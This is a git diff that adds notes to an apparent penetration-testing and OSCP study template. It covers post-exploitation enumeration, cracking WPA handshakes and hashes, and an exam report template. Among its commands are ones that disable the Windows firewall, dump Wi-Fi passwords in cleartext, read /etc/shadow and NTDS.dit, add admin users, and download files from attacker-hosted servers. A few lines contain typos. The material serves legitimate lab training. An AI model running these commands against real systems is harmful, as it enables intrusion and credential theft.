dnsdomainname + +## List all current connections + +- lsof -i +- lsof -i :80 +- grep 80 /etc/services +- netstat -antup +- netstat -antpx +- netstat -tulpn +- chkconfig --list +- chkconfig --list | grep 3:on + +## Check the routes: + +- arp -e +- route +- route -n +- /sbin/route -nee +- ip route list + +References: + diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/General Notes Windows.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/General Notes Windows.md new file mode 100644 index 0000000..207d060 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/General Notes Windows.md 
@@ -0,0 +1,48 @@ +## List all network interfaces, IP, and DNS. + +- ipconfig /all +- Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address +- Get-DnsClientServerAddress -AddressFamily IPv4 | ft + + +## List all current connections + +netstat -nao + +## List firewall state and current configuration + +- netsh advfirewall firewall dump +- netsh firewall show state +- netsh firewall show config + +# List firewall's blocked ports + +- $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports + +# Disable firewall + +- netsh firewall set opmode disable (Older Versions of Windows) +- netsh advfirewall set allprofiles state off + +## List current routing table + +- route print +- Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex + +## List the ARP table + +- arp -A +- Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State + +## List all network shares + +- net share + +## Wifi Passwords: + +Finding the SSID: +- netsh wland show profile + +Obtaining the cleartext password: +- netsh wlan show profile key=clear +- cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/Target _1.md new file mode 100644 index 0000000..68755f5 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/Target _1.md @@ -0,0 +1 @@ +# Fill in results or other information about your target here: \ No newline at end of file 
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Running Processes/General Notes Linux.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Running Processes/General Notes Linux.md new file mode 100644 index 0000000..ea453c4 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Running Processes/General Notes Linux.md @@ -0,0 +1,20 @@ +# Linux Commands to run: + +- top +- htop +- ps -e +- ps aux +- ps aux | more +- ps aux | less + +## Finding processes + +- pgrep + +## Terminating a Process + +- kill +- kill -9 PID +- pkill processName +- killall + diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Running Processes/General Notes Windows.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Running Processes/General Notes Windows.md new file mode 100644 index 0000000..bd3d89c --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Running Processes/General Notes Windows.md @@ -0,0 +1,11 @@ +# Check for Processes + +- tasklist +- wmic process list full + +# In PowerShell +- Get-Process +- Get-Process -Name 'Notepad' + +List path where the process is running: +- (Get-Process -Name 'Calculator').Path diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Running Processes/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Running Processes/Target _1.md new file mode 100644 index 0000000..68755f5 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Running Processes/Target _1.md 
@@ -0,0 +1 @@ +# Fill in results or other information about your target here: \ No newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/General Notes Linux.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/General Notes Linux.md new file mode 100644 index 0000000..53cafb1 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/General Notes Linux.md @@ -0,0 +1,7 @@ +# Linux: + +- cat /etc/crontab +- cat /etc/anacrontab +- cat /etc/frontal +- cat /etc/anacron +- systemctl list-timers --all \ No newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/General Notes Windows.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/General Notes Windows.md new file mode 100644 index 0000000..5ed0440 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/General Notes Windows.md @@ -0,0 +1,16 @@ +# Windows: + +- schtasks + +## Impacket: + +- python3 atexec.py Domain/Administrator:@123@172.21.0.0 systeminfo + + +# Linux: + +- cat /etc/crontab +- cat /etc/anacrontab +- cat /etc/frontal +- cat /etc/anacron +- systemctl list-timers --all \ No newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/Target _1.md new file mode 100644 index 0000000..68755f5 --- /dev/null 
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/Target _1.md @@ -0,0 +1 @@ +# Fill in results or other information about your target here: \ No newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Exploitation/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Exploitation/Target _1.md new file mode 100644 index 0000000..68755f5 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Exploitation/Target _1.md @@ -0,0 +1 @@ +# Fill in results or other information about your target here: \ No newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Information/General Notes Linux.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Information/General Notes Linux.md new file mode 100644 index 0000000..c3d32ee --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Information/General Notes Linux.md @@ -0,0 +1,23 @@ +## For all Linux Distro's: + +- uname -a +- cat /etc/issue +- cat /proc/version + +## PowerShell + +- $PSVersionTable + +Obtaining Systems Enviorment Variables: + +- Get-ChildItem -Path Env: + + +## Debian: + +- dmesg | grep Linux + +## RedHat: + +- rpm -q kernel + 
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Information/General Notes Windows.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Information/General Notes Windows.md new file mode 100644 index 0000000..7f7edd4 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Information/General Notes Windows.md @@ -0,0 +1,9 @@ +# Command Line: + +- systeminfo + +# PowerShell + +- Get-ComputerInfo +- Get-ComputerInfo -Property "*version" +- Get-ComputerInfo -Property "*version", "os*" | select WindowsCurrentVersion, WindowsVersion, OsName, OsBuildNumber, OsHotFixes, OsArchitecture | fl \ No newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Information/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Information/Target _1.md new file mode 100644 index 0000000..e69de29 diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Users and Groups/General Notes Linux_.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Users and Groups/General Notes Linux_.md new file mode 100644 index 0000000..31964bf --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Users and Groups/General Notes Linux_.md 
@@ -0,0 +1,21 @@ +## Enumerating Linux Users + +- cat /etc/passwd +- less etc/passwd +- getent passwd | awk -F: '{ print $1}' +- cut -d: -f1 /etc/passwd +- awk –F: ‘{ print $1}’ /etc/passwd +- getent parrwd {1000..6000} + +## enumerating Users Permissions + +- id +- id -nG +- getent group + +## Enumerating Linux Groups + +- groups +- less /etc/group +- getent groups +- getent group | awk -F: '{ print $1}' \ No newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Users and Groups/General Notes Windows.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Users and Groups/General Notes Windows.md new file mode 100644 index 0000000..ca735d8 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Users and Groups/General Notes Windows.md @@ -0,0 +1,24 @@ +View your current user: + +- whoami + +View information about the current user: + +- net user afsimmons + +- net user afsimmons /domain (For a domain user) + +View Local Groups: + +- net localgroup +- net localgroup Administrators + +Add a new user: + +- net user afsimmons enterpasswordhere /add + +Add a user in a localgroup: + +- net localgroup Administrators afsimmons + + diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Users and Groups/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Users and Groups/Target _1.md new file mode 100644 index 0000000..68755f5 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Users and Groups/Target _1.md @@ -0,0 +1 @@ +# Fill in results or other information about your target here: \ No newline at end of file 
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Transferring Files.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Transferring Files.md new file mode 100644 index 0000000..2993d3f --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Transferring Files.md @@ -0,0 +1,55 @@ +# Services to Host Files on your System: + +General Options: + +FTP: + +Install pyftpdlib +- pip3 install pyftpdlib + +Pure-ftpd +- sudo apt install pure-ftpd +- service pure-ftpd start + +Run (-w flag allows anonymous write access) +- Python3 -m pyftpdlib -p 21 -w + +Web: + +- Python3 -m http.server 443 +- service apache2 start + +Powershell: + +Raw (Will get flagged by AV/AMSI): + +- powershell -c (New-Object Net.WebClient).DownloadFile('http://172.21.0.0:port/file', 'output-file' +- powershell -c Invoke-WebRequest -Uri "http://172.21.0.0" -OutFile "C:\path\file" + + +Use Powercat: + +Send File: + powercat -c 10.1.1.1 -p 443 -i C:\inputfile +Recieve File: + powercat -l -p 8000 -of C:\inputfile + +Linux: + +scp: + +- scp [OPTION] [user@]SRC_HOST:]file1 [user@]DEST_HOST:]file2 + +scp through ssh: + +- scp -P 2322 passwords.txt remote_username@172.21.0.2:/remote/directory + +scp remote file to local system: + +- scp remote_username@172.21.0.2:/remote/file.txt /local/directory + + +# Services to allow you to upload files to your system from the target: + +- SimpleHTTPServer Upload: https://gist.github.com/touilleMan/eb02ea40b93e52604938 + \ No newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Cracking WEP_WPA_WPA 2 PSK Authetication.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Cracking WEP_WPA_WPA 2 PSK Authetication.md new file mode 100644 index 0000000..2f697ae --- /dev/null 
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Cracking WEP_WPA_WPA 2 PSK Authetication.md @@ -0,0 +1,36 @@ +## Capture Handshake + +1. airmon-ng start wlan0 +2. airodump-ng mon0 --write capture.cap -c 11 +3. aireplay-ng --deauth 0 -a bb:bb:bb:bb:bb:bb mon0 + +Convert pcap files for john and hashcat + +/usr/lib/hashcat-utils/cap2hccapx.bin input.pcap output.hccapx [filter by essid] [additional network essid:bssid] +/usr/sbin/hccap2john +/usr/sbin/vncpcap2john +/usr/sbin/wpapcap2john + + +## Cracking Handshake with Aircrack + +- aircrack-ng -w /usr/share/wordlist/fasttrack.txt 0001.cap + +## Cracking Handshakes with Hashcat + +- hashcat.exe -m 2500 capture.hccapx rockyou.txt (Dictionary Attack) +- hashcat.exe -m 2500 -a3 capture.hccapx ?d?d?d?d?d?d?d?d (Brute-Force) +- hashcat.exe -m 2500 -r rules/best64.rule capture.hccapx rockyou.txt (Rule-Based) + +## Cracking Handshakes with John The Ripper + +Did you run hccap2john? + +- john --format=wpapsk --wordlist=/usr/share/wordlists/rockyou.txt crackmecap +- john --format=wpapsk-opencl --wordlist=/usr/share/wordlists/rockyou.txt crackmecap + + + +Other Resources: + +https://github.com/lgandx/PCredz \ No newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Hashcat.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Hashcat.md new file mode 100644 index 0000000..da4de42 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Hashcat.md 
@@ -0,0 +1,61 @@ + +## BENCHMARK TEST (HASH TYPE) + +- hashcat -b -m #type + +## SHOW EXAMPLE HASH + +- hashcat -m #type --example-hashes + +## DICTIONARY ATTACK + +- hashcat -a 0 -m #type hash.txt dict.txt + +DICTIONARY + RULES ATTACK + +- hashcat -a 0 -m #type hash.txt dict.txt -r rule.txt + +COMBINATION ATTACK + +- hashcat -a 1 -m #type hash.txt dict1.txt dict2.txt + +## MASK ATTACK + +- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a + +HYBRID DICTIONARY + MASK + +- hashcat -a 6 -m #type hash.txt dict.txt ?a?a?a?a + +HYBRID MASK + DICTIONARY + +- hashcat -a 7 -m #type hash.txt ?a?a?a?a dict.txt + + +## INCREMENT + +DEFAULT INCREMENT + +- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment + +INCREMENT MINIMUM LENGTH + +- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment-min=4 + +INCREMENT MAX LENGTH + +- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a --increment-max=5 + +SESSION RESTORE + +- hashcat -a 0 -m #type --restore --session hash.txt dict.txt + + +## Cracking krb5ts Keys + +- hashcat -m 13100 --force + +## Cracking Asrep keys + +- hashcat -a 0 -m 18200 + diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/John The Ripper.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/John The Ripper.md new file mode 100644 index 0000000..b110a6e --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/John The Ripper.md 
@@ -0,0 +1,47 @@ +DICTIONARY ATTACK +- john --format=#type --wordlist=dict.txt hash.txt + +BRUTEFORCE ATTACK +- john --format=#type hash. txt + +MASK ATTACK +- john --format=#type --mask=?l?l?l?l?l?l hash.txt -min-len=6 + +INCREMENTAL ATTACK +- john --incremental hash.txt + +DICTIONARY + RULES ATTACK +- john --format=#type --wordlist=dict.t + + +Other Notes: + +BENCHMARK TEST +- john --test + +SESSION NAME +- john hash.txt --session=example_name + +SESSION RESTORE +- john --restore=example_name + +SHOW CRACKED RESULTS +- john hash.txt --pot= --show + +WORDLIST GENERATION +- john --wordlist=dict.txt --stdout --external:[filter name] > out.txt + +CRACKING SSH KEYS: + +- /usr/share/john/ssh2john.py id_rsa > hash.john +- john --wordlist=/usr/share/wordlists/rockyou.txt hash.john + +CRACKING KRB5TGS KEYS + +- john --format=krb5tgs --wordlist= hashes.db + +## Impacket Tools: + +- secretsdump.py -ntds ~/Extract/ntds.dit -system ~/Extract/SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm-hashes + +If you have the NTDS.dit file and the SYSTEM hive: + +- secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL + +# Linux + +Requires Root Privileges + +- cat /etc/shadow + +- cp /etc/passwd and shadow +- unshadow passwd shadow + +# OSX + +10.5-10.7 + +- dscl localhost -read /Search/Users/|grep GeneratedUID|cut -c15-cat +/var/db/shadow/hash/ | cut -c169-216 > osx_hash.txt + +10.8-10.12 + +- sudo defaults read /var/db/dslocal/nodes/Default/users/.plist ShadowHashData|tr -dc ‘ +0-9a-f’|xxd -p -r|plutil -convert xml1 - -o - + +# Other Resources: + +- Lsassy: https://github.com/Hackndo/lsassy \ No newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Passwords/General Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Passwords/General Notes.md new file mode 100644 index 0000000..6db5b74 --- /dev/null 
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Passwords/General Notes.md
@@ -0,0 +1 @@
+# Any passwords or hashs that you fine should be documented here. Include steps on how you were able to obtain them from your target:
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Proof_Screenshots/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Proof_Screenshots/Target _1.md
new file mode 100644
index 0000000..56b7267
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Proof_Screenshots/Target _1.md
@@ -0,0 +1 @@
+# Fill in results or other information about your targets here:
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/6. Reporting/OSCP Report Template.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/6. Reporting/OSCP Report Template.md
new file mode 100644
index 0000000..055c5d1
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/6. Reporting/OSCP Report Template.md
@@ -0,0 +1,365 @@
+
+#
Offensive Security Lab/Exam Penetration Test Report
+ +![d2550626a1c94aeebd273d43be0669c9.png](../../_resources/d2550626a1c94aeebd273d43be0669c9.png) + +##
student@emailaddress.com Student-ID
+ +######
2020-XX-XX
+ + +
+ +## Contents + +- 1 Offensive Security Exam Penetration Test Report + - 1.1 Introduction + - 1.2 Objective + - 1.3 Requirements +- 2 High-Level Summary + - 2.1 Recommendations +- 3 Methodologies + - 3.1 Information Gathering + - 3.2 Penetration + - 3.2.1 System IP: 192.168.x.x + - 3.2.1.1 Service Enumeration + - 3.2.1.2 Privilege Escalation + - 3.2.2 System IP: 192.168.x.x + - 3.2.2.1 Service Enumeration + - 3.2.2.2 Privilege Escalation + - 3.2.3 System IP: 192.168.x.x + - 3.2.3.1 Service Enumeration + - 3.2.3.2 Privilege Escalation + - 3.2.4 System IP: 192.168.x.x + - 3.2.4.1 Service Enumeration + - 3.2.4.2 Privilege Escalation + - 3.2.5 System IP: 192.168.x.x + - 3.3 Maintaining Access + - 3.4 House Cleaning +- 4 Additional Items + - 4.1 Appendix - Proof and Local Contents: + - 4.2 Appendix - Metasploit/Meterpreter Usage + +
+ +## Introduction + +The Offensive Security Exam penetration test report contains all efforts that were conducted in order to pass the Offensive Security exam. +This report will be graded from a standpoint of correctness and fullness to all aspects of the exam. +The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Certified Professional. + +## Objective + +The objective of this assessment is to perform an internal penetration test against the Offensive Security Lab/Exam network. +The student is tasked with following methodical approach in obtaining access to the objective goals. +This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report. +An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this course. +Use the sample report as a guideline to get you through the reporting. + +## Requirements + +The student will be required to fill out this penetration testing report fully and to include the following sections: + +- Overall High-Level Summary and Recommendations (non-technical) +- Methodology walkthrough and detailed outline of steps taken +- Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable +- Any additional items that were not included + +
+ +# High-Level Summary + +I was tasked with performing an internal penetration test towards Offensive Security Exam. +An internal penetration test is a dedicated attack against internally connected systems. +The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Security’s internal exam systems – the THINC.local domain. +My overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security. + +When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Security’s network. +When performing the attacks, I was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. +During the testing, I had administrative level access to multiple systems. +All systems were successfully exploited and access granted. +These systems as well as a brief description on how access was obtained are listed below: + +- 192.168.xx.xx (hostname) - Name of initial exploit +- 192.168.xx.xx (hostname) - Name of initial exploit +- 192.168.xx.xx (hostname) - Name of initial exploit +- 192.168.xx.xx (hostname) - Name of initial exploit +- 192.168.xx.xx (hostname) - BOF + +## Recommendations + +I recommend patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. +One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date. + +
+ +# Methodologies + +I utilized a widely adopted approach to performing penetration testing that is effective in testing how well the Offensive Security Exam environments is secured. +Below is a breakout of how I was able to identify and exploit the variety of systems and includes all individual vulnerabilities found. + +## Information Gathering + +The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. +During this penetration test, I was tasked with exploiting the exam network. +The specific IP addresses were: + +**Exam Network** + +- 192.168. +- 192.168. +- 192.168. +- 192.168. +- 192.168. + +## Penetration + +The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems. +During this penetration test, I was able to successfully gain access to **X** out of the **X** systems. + +
+ +### System IP: 192.168.x.x + +#### Service Enumeration + +The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems. +This is valuable for an attacker as it provides detailed information on potential attack vectors into a system. +Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test. +In some cases, some ports may not be listed. + +Server IP Address | Ports Open +------------------|---------------------------------------- +192.168.x.x | **TCP**: 80,443 +**UDP**: 1434,161 + +**Nmap Scan Results:** + +*Initial Shell Vulnerability Exploited* + +*Additional info about where the initial shell was acquired from* + +**Vulnerability Explanation:** + +**Vulnerability Fix:** + +**Severity:** + +**Proof of Concept Code Here:** + +**Local.txt Proof Screenshot** + +**Local.txt Contents** + +#### Privilege Escalation + +*Additional Priv Esc info* + +**Vulnerability Exploited:** + +**Vulnerability Explanation:** + +**Vulnerability Fix:** + +**Severity:** + +**Exploit Code:** + +**Proof Screenshot Here:** + +**Proof.txt Contents:** + +
+ +### System IP: 192.168.x.x + +#### Service Enumeration + +Server IP Address | Ports Open +------------------|---------------------------------------- +192.168.x.x | **TCP**: 80,443 +**UDP**: 1434,161 + +**Nmap Scan Results:** + +*Initial Shell Vulnerability Exploited* + +*Additional info about where the initial shell was acquired from* + +**Vulnerability Explanation:** + +**Vulnerability Fix:** + +**Severity:** + +**Proof of Concept Code Here:** + +**Local.txt Proof Screenshot** + +**Local.txt Contents** + +#### Privilege Escalation + +*Additional Priv Esc info* + +**Vulnerability Exploited:** + +**Vulnerability Explanation:** + +**Vulnerability Fix:** + +**Severity:** + +**Exploit Code:** + +**Proof Screenshot Here:** + +**Proof.txt Contents:** + +
+ +### System IP: 192.168.x.x + +#### Service Enumeration + +Server IP Address | Ports Open +------------------|---------------------------------------- +192.168.x.x | **TCP**: 80,443 +**UDP**: 1434,161 + +**Nmap Scan Results:** + +*Initial Shell Vulnerability Exploited* + +*Additional info about where the initial shell was acquired from* + +**Vulnerability Explanation:** + +**Vulnerability Fix:** + +**Severity:** + +**Proof of Concept Code Here:** + +**Local.txt Proof Screenshot** + +**Local.txt Contents** + +#### Privilege Escalation + +*Additional Priv Esc info* + +**Vulnerability Exploited:** + +**Vulnerability Explanation:** + +**Vulnerability Fix:** + +**Severity:** + +**Exploit Code:** + +**Proof Screenshot Here:** + +**Proof.txt Contents:** + +
+ +### System IP: 192.168.x.x + +#### Service Enumeration + +Server IP Address | Ports Open +------------------|---------------------------------------- +192.168.x.x | **TCP**: 80,443 +**UDP**: 1434,161 + +**Nmap Scan Results:** + +*Initial Shell Vulnerability Exploited* + +*Additional info about where the initial shell was acquired from* + +**Vulnerability Explanation:** + +**Vulnerability Fix:** + +**Severity:** + +**Proof of Concept Code Here:** + +**Local.txt Proof Screenshot** + +**Local.txt Contents** + +#### Privilege Escalation + +*Additional Priv Esc info* + +**Vulnerability Exploited:** + +**Vulnerability Explanation:** + +**Vulnerability Fix:** + +**Severity:** + +**Exploit Code:** + +**Proof Screenshot Here:** + +**Proof.txt Contents:** + +
+ +### System IP: 192.168.x.x + +**Vulnerability Exploited: ** + +**Proof Screenshot:** + +
+ +## Maintaining Access + +Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable. +The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again. +Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit. + +## House Cleaning + +The house cleaning portions of the assessment ensures that remnants of the penetration test are removed. +Often fragments of tools or user accounts are left on an organization's computer which can cause security issues down the road. +Ensuring that we are meticulous and no remnants of our penetration test are left over is important. + +After collecting trophies from the exam network was completed, Alec removed all user accounts and passwords as well as the Meterpreter services installed on the system. +Offensive Security should not have to remove any user accounts or services from the system. + +
+ + +# Additional Items + +## Appendix - Proof and Local Contents: + +IP (Hostname) | Local.txt Contents | Proof.txt Contents +--------------|--------------------|------------------- +192.168.x.x | hash_here | hash_here +192.168.x.x | hash_here | hash_here +192.168.x.x | hash_here | hash_here +192.168.x.x | hash_here | hash_here +192.168.x.x | hash_here | hash_here + +## Appendix - Metasploit/Meterpreter Usage + +For the exam, I used my Metasploit/Meterpreter allowance on the following machine: `192.168.x.x` + +
+ +
+ +![310x310.png](../../_resources/310x310.png) + +
+ + diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/6. Reporting/Tips for Writing a Report.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/6. Reporting/Tips for Writing a Report.md new file mode 100644 index 0000000..0fa6735 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/6. Reporting/Tips for Writing a Report.md @@ -0,0 +1,18 @@ +1. Understand who is going to be reading this and who is the target audience? +2. The report needs to clear that a non-technical person would understand +3. Report should include the following: + 1. Executive Summary + 2. Technical Summary + 3. Detail Report of findings + 4. Recommendations for remediation (If possible) + + + +Resources: + +- https://blog.zsec.uk/ltr101-pentest-reporting/ +- https://github.com/juliocesarfort/public-pentesting-reports + +Public Pentesting Reports: + +- https://github.com/juliocesarfort/public-pentesting-reports \ No newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/General Information.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/General Information.md new file mode 100644 index 0000000..1ef94c2 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/General Information.md 
@@ -0,0 +1,29 @@ +Created by TJ Null: + +Twitter: https://twitter.com/TJ_Null +Github: https://github.com/tjnull + +Contribution: + +If you would like to contribute to the template or provide suggestions, then you can submit an issue on the Github Repo here: +- https://github.com/tjnull/TJ-JPT + +## Changelog: + +v1.0: Original Template + +v2.0 + +2. Enumeration +- Added an FTP Notebook to include notes for that identified service +- Added more content in Active Directory +- Web has a subnotebook to include any content from the changelog.txt file +- Fixed the gobuster oneliners to match with the recent changes from the tool + +3. Exploitation +- Added some custom options for searchsploit + +4. Post Exploitation +- Moved the subnotebook into a subnotebook (Target #1) so the user can copy the subnotebook and add another one under post exploitation for other targets. +- Created a sub notebook to include the output from automated priv esc scripts that are used. +- Included tools, tips, and resources in all sections for priv esc \ No newline at end of file diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/Pivoting_Tunneling.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/Pivoting_Tunneling.md new file mode 100644 index 0000000..fbd6f11 --- /dev/null +++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/Pivoting_Tunneling.md 
